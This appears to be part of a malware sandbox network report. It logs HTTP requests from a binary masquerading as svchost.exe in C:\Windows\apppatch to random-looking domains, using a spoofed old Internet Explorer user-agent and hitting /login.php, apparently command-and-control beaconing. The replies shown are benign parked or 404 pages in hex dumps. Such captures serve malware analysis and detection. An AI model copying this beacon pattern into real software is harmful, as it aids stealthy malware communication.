                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79
                                                                                                                                                                                                          Data Ascii: tent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70
                                                                                                                                                                                                          Data Ascii: ble,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[typ


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.86321275.2.71.1994431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:28 GMT
                                                                                                                                                                                                          Etag: "thhv81oall19wv"
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Server: awselb/2.0
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          X-Powered-By: Next.js
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                          Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                          Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                          Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                          Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                          Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                          Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                          Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                          Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                          Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          7192.168.2.863213188.114.96.3443
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:30 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYInVkQAk1Xvke%2BhWXJENW%2FYYIUMCfDNjM7sQzEZ6F0ttiMwQesDUGPkVS%2BpLpODDVkSDIC3KTTjzFaFgQ3Fw23pry%2FDMDCxXKbl76V3MGg0LJZG0vJopElRFhfK0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9e99aa58c1e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1250&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2305732&cwnd=246&unsent_bytes=0&cid=1e1901910ae2c204&ts=841&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC420INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70
                                                                                                                                                                                                          Data Ascii: yle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta prop
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e
                                                                                                                                                                                                          Data Ascii: on c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                          Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
                                                                                                                                                                                                          2024-11-11 17:24:31 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                          Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
